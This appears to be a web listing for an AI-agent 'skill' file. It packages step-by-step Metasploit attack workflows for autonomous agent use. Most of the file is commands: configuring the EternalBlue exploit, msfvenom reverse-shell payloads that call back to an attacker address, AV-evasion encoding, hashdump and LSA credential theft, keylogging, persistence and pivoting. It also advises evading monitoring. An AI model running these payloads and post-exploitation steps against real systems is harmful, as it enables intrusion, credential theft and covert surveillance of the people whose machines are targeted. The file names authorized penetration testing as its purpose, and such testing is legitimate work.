metasploit-framework
This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the Metasploit Framework in security assessments.
Best use case
metasploit-framework is best used when you need a repeatable AI agent workflow instead of a one-off prompt. It is especially useful for teams working in multi. This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the Metasploit Framework in security assessments.
This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the Metasploit Framework in security assessments.
Users should expect a more consistent workflow output, faster repeated execution, and less time spent rewriting prompts from scratch.
Practical example
Example input
Use the "metasploit-framework" skill to help with this workflow task. Context: This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the Metasploit Framework in security assessments.
Example output
A structured workflow result with clearer steps, more consistent formatting, and an output that is easier to reuse in the next run.
When to use this skill
- Use this skill when you want a reusable workflow rather than writing the same prompt again and again.
When not to use this skill
- Do not use this when you only need a one-off answer and do not need a reusable workflow.
- Do not use it if you cannot install or maintain the related files, repository context, or supporting tools.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/metasploit-framework/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How metasploit-framework Compares
| Feature / Agent | metasploit-framework | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the Metasploit Framework in security assessments.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Metasploit Framework ## Purpose Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments. ## Prerequisites ### Required Tools ```bash # Metasploit comes pre-installed on Kali Linux # For other systems: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall # Start PostgreSQL for database support sudo systemctl start postgresql sudo msfdb init ``` ### Required Knowledge - Network and system fundamentals - Understanding of vulnerabilities and exploits - Basic programming concepts - Target enumeration techniques ### Required Access - Written authorization for testing - Network access to target systems - Understanding of scope and rules of engagement ## Outputs and Deliverables 1. **Exploitation Evidence** - Screenshots and logs of successful compromises 2. **Session Logs** - Command history and extracted data 3. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references 4. **Post-Exploitation Artifacts** - Credentials, files, and system information ## Core Workflow ### Phase 1: MSFConsole Basics Launch and navigate the Metasploit console: ```bash # Start msfconsole msfconsole # Quiet mode (skip banner) msfconsole -q # Basic navigation commands msf6 > help # Show all commands msf6 > search [term] # Search modules msf6 > use [module] # Select module msf6 > info # Show module details msf6 > show options # Display required options msf6 > set [OPTION] [value] # Configure option msf6 > run / exploit # Execute module msf6 > back # Return to main console msf6 > exit # Exit msfconsole ``` ### Phase 2: Module Types Understand the different module categories: ```bash # 1. Exploit Modules - Target specific vulnerabilities msf6 > show exploits msf6 > use exploit/windows/smb/ms17_010_eternalblue # 2. Payload Modules - Code executed after exploitation msf6 > show payloads msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp # 3. Auxiliary Modules - Scanning, fuzzing, enumeration msf6 > show auxiliary msf6 > use auxiliary/scanner/smb/smb_version # 4. Post-Exploitation Modules - Actions after compromise msf6 > show post msf6 > use post/windows/gather/hashdump # 5. Encoders - Obfuscate payloads msf6 > show encoders msf6 > set ENCODER x86/shikata_ga_nai # 6. Nops - No-operation padding for buffer overflows msf6 > show nops # 7. Evasion - Bypass security controls msf6 > show evasion ``` ### Phase 3: Searching for Modules Find appropriate modules for targets: ```bash # Search by name msf6 > search eternalblue # Search by CVE msf6 > search cve:2017-0144 # Search by platform msf6 > search platform:windows type:exploit # Search by type and keyword msf6 > search type:auxiliary smb # Filter by rank (excellent, great, good, normal, average, low, manual) msf6 > search rank:excellent # Combined search msf6 > search type:exploit platform:linux apache # View search results columns: # Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description ``` ### Phase 4: Configuring Exploits Set up an exploit for execution: ```bash # Select exploit module msf6 > use exploit/windows/smb/ms17_010_eternalblue # View required options msf6 exploit(windows/smb/ms17_010_eternalblue) > show options # Set target host msf6 exploit(...) > set RHOSTS 192.168.1.100 # Set target port (if different from default) msf6 exploit(...) > set RPORT 445 # View compatible payloads msf6 exploit(...) > show payloads # Set payload msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp # Set local host for reverse connection msf6 exploit(...) > set LHOST 192.168.1.50 msf6 exploit(...) > set LPORT 4444 # View all options again to verify msf6 exploit(...) > show options # Check if target is vulnerable (if supported) msf6 exploit(...) > check # Execute exploit msf6 exploit(...) > exploit # or msf6 exploit(...) > run ``` ### Phase 5: Payload Types Select appropriate payload for the situation: ```bash # Singles - Self-contained, no staging windows/shell_reverse_tcp linux/x86/shell_bind_tcp # Stagers - Small payload that downloads larger stage windows/meterpreter/reverse_tcp linux/x86/meterpreter/bind_tcp # Stages - Downloaded by stager, provides full functionality # Meterpreter, VNC, shell # Payload naming convention: # [platform]/[architecture]/[payload_type]/[connection_type] # Examples: windows/x64/meterpreter/reverse_tcp linux/x86/shell/bind_tcp php/meterpreter/reverse_tcp java/meterpreter/reverse_https android/meterpreter/reverse_tcp ``` ### Phase 6: Meterpreter Session Work with Meterpreter post-exploitation: ```bash # After successful exploitation, you get Meterpreter prompt meterpreter > # System Information meterpreter > sysinfo meterpreter > getuid meterpreter > getpid # File System Operations meterpreter > pwd meterpreter > ls meterpreter > cd C:\\Users meterpreter > download file.txt /tmp/ meterpreter > upload /tmp/tool.exe C:\\ # Process Management meterpreter > ps meterpreter > migrate [PID] meterpreter > kill [PID] # Networking meterpreter > ipconfig meterpreter > netstat meterpreter > route meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1 # Privilege Escalation meterpreter > getsystem meterpreter > getprivs # Credential Harvesting meterpreter > hashdump meterpreter > run post/windows/gather/credentials/credential_collector # Screenshots and Keylogging meterpreter > screenshot meterpreter > keyscan_start meterpreter > keyscan_dump meterpreter > keyscan_stop # Shell Access meterpreter > shell C:\Windows\system32> whoami C:\Windows\system32> exit meterpreter > # Background Session meterpreter > background msf6 exploit(...) > sessions -l msf6 exploit(...) > sessions -i 1 ``` ### Phase 7: Auxiliary Modules Use auxiliary modules for reconnaissance: ```bash # SMB Version Scanner msf6 > use auxiliary/scanner/smb/smb_version msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(...) > run # Port Scanner msf6 > use auxiliary/scanner/portscan/tcp msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > set PORTS 1-1000 msf6 auxiliary(...) > run # SSH Version Scanner msf6 > use auxiliary/scanner/ssh/ssh_version msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(...) > run # FTP Anonymous Login msf6 > use auxiliary/scanner/ftp/anonymous msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > run # HTTP Directory Scanner msf6 > use auxiliary/scanner/http/dir_scanner msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > run # Brute Force Modules msf6 > use auxiliary/scanner/ssh/ssh_login msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt msf6 auxiliary(...) > run ``` ### Phase 8: Post-Exploitation Modules Run post modules on active sessions: ```bash # List sessions msf6 > sessions -l # Run post module on specific session msf6 > use post/windows/gather/hashdump msf6 post(windows/gather/hashdump) > set SESSION 1 msf6 post(...) > run # Or run directly from Meterpreter meterpreter > run post/windows/gather/hashdump # Common Post Modules # Credential Gathering post/windows/gather/credentials/credential_collector post/windows/gather/lsa_secrets post/windows/gather/cachedump post/multi/gather/ssh_creds # System Enumeration post/windows/gather/enum_applications post/windows/gather/enum_logged_on_users post/windows/gather/enum_shares post/linux/gather/enum_configs # Privilege Escalation post/windows/escalate/getsystem post/multi/recon/local_exploit_suggester # Persistence post/windows/manage/persistence_exe post/linux/manage/sshkey_persistence # Pivoting post/multi/manage/autoroute ``` ### Phase 9: Payload Generation with msfvenom Create standalone payloads: ```bash # Basic Windows reverse shell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe # Linux reverse shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf # PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php # Python reverse shell msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py # PowerShell payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1 # ASP web shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp # WAR file (Tomcat) msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war # Android APK msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk # Encoded payload (evade AV) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe # List available formats msfvenom --list formats # List available encoders msfvenom --list encoders ``` ### Phase 10: Setting Up Handlers Configure listener for incoming connections: ```bash # Manual handler setup msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.1.50 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > exploit -j # The -j flag runs as background job msf6 > jobs -l # When payload executes on target, session opens [*] Meterpreter session 1 opened # Interact with session msf6 > sessions -i 1 ``` ## Quick Reference ### Essential MSFConsole Commands | Command | Description | |---------|-------------| | `search [term]` | Search for modules | | `use [module]` | Select a module | | `info` | Display module information | | `show options` | Show configurable options | | `set [OPT] [val]` | Set option value | | `setg [OPT] [val]` | Set global option | | `run` / `exploit` | Execute module | | `check` | Verify target vulnerability | | `back` | Deselect module | | `sessions -l` | List active sessions | | `sessions -i [N]` | Interact with session | | `jobs -l` | List background jobs | | `db_nmap` | Run nmap with database | ### Meterpreter Essential Commands | Command | Description | |---------|-------------| | `sysinfo` | System information | | `getuid` | Current user | | `getsystem` | Attempt privilege escalation | | `hashdump` | Dump password hashes | | `shell` | Drop to system shell | | `upload/download` | File transfer | | `screenshot` | Capture screen | | `keyscan_start` | Start keylogger | | `migrate [PID]` | Move to another process | | `background` | Background session | | `portfwd` | Port forwarding | ### Common Exploit Modules ```bash # Windows exploit/windows/smb/ms17_010_eternalblue exploit/windows/smb/ms08_067_netapi exploit/windows/http/iis_webdav_upload_asp exploit/windows/local/bypassuac # Linux exploit/linux/ssh/sshexec exploit/linux/local/overlayfs_priv_esc exploit/multi/http/apache_mod_cgi_bash_env_exec # Web Applications exploit/multi/http/tomcat_mgr_upload exploit/unix/webapp/wp_admin_shell_upload exploit/multi/http/jenkins_script_console ``` ## Constraints and Limitations ### Legal Requirements - Only use on systems you own or have written authorization to test - Document all testing activities - Follow rules of engagement - Report all findings to appropriate parties ### Technical Limitations - Modern AV/EDR may detect Metasploit payloads - Some exploits require specific target configurations - Firewall rules may block reverse connections - Not all exploits work on all target versions ### Operational Security - Use encrypted channels (reverse_https) when possible - Clean up artifacts after testing - Avoid detection by monitoring systems - Limit post-exploitation to agreed scope ## Troubleshooting | Issue | Solutions | |-------|-----------| | Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` | | Exploit fails/no session | Run `check`; verify payload architecture; check firewall; try different payloads | | Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript | | Payload detected by AV | Use encoding `-e x86/shikata_ga_nai -i 10`; use evasion modules; custom templates |
Related Skills
startup-metrics-framework
This skill should be used when the user asks about "key startup metrics", "SaaS metrics", "CAC and LTV", "unit economics", "burn multiple", "rule of 40", "marketplace metrics", or requests guidance on tracking and optimizing business performance metrics.
framework-migration-legacy-modernize
Orchestrate a comprehensive legacy system modernization using the strangler fig pattern, enabling gradual replacement of outdated components while maintaining continuous business operations through ex
framework-migration-deps-upgrade
You are a dependency management expert specializing in safe, incremental upgrades of project dependencies. Plan and execute dependency updates with minimal risk, proper testing, and clear migration pa
framework-migration-code-migrate
You are a code migration expert specializing in transitioning codebases between frameworks, languages, versions, and platforms. Generate comprehensive migration plans, automated migration scripts, and
data-quality-frameworks
Implement data quality validation with Great Expectations, dbt tests, and data contracts. Use when building data quality pipelines, implementing validation rules, or establishing data contracts.
backtesting-frameworks
Build robust backtesting systems for trading strategies with proper handling of look-ahead bias, survivorship bias, and transaction costs. Use when developing trading algorithms, validating strategies, or building backtesting infrastructure.
agent-framework-azure-ai-py
Build Azure AI Foundry agents using the Microsoft Agent Framework Python SDK (agent-framework-azure-ai). Use when creating persistent agents with AzureAIAgentsProvider, using hosted tools (code interpreter, file search, web search), integrating MCP servers, managing conversation threads, or implementing streaming responses. Covers function tools, structured outputs, and multi-tool agents.
agent-framework
Create AI agents and workflows using Microsoft Agent Framework SDK. Supports single-agent and multi-agent workflow patterns. USE FOR: create agent, build agent, scaffold agent, new agent, agent framework, workflow pattern, multi-agent, MCP tools, create workflow. DO NOT USE FOR: deploying agents (use deploy), evaluating agents (use agent/evaluate), Azure AI Foundry agents without Agent Framework SDK.
react-server-components-framework
Design and implement React Server Components with Next.js 15 App Router. Master server-first architecture, streaming SSR, Server Actions, and modern data fetching patterns for 2025+ frontend development.
api-design-framework
Use this skill when designing REST, GraphQL, or gRPC APIs. Provides comprehensive API design patterns, versioning strategies, error handling conventions, authentication approaches, and OpenAPI/AsyncAPI templates. Ensures consistent, well-documented, and developer-friendly APIs across all backend services.
pentest-metasploit
Penetration testing framework for exploit development, vulnerability validation, and authorized security assessments using Metasploit Framework. Use when: (1) Validating vulnerabilities in authorized security assessments, (2) Demonstrating exploit impact for security research, (3) Testing defensive controls in controlled environments, (4) Conducting authorized penetration tests with proper scoping and authorization, (5) Developing post-exploitation workflows for red team operations.
tool-selection-framework
Design systematic decision frameworks for selecting appropriate AI tools (Claude Code vs Gemini CLI) based on context requirements, codebase size, reasoning depth needs, and task complexity. Use this skill when starting projects with unclear tool requirements, optimizing context-constrained workflows, or designing multi-phase strategies that leverage multiple tools' strengths. This skill helps match tool capabilities to task characteristics, preventing wasted context and ensuring optimal resource allocation.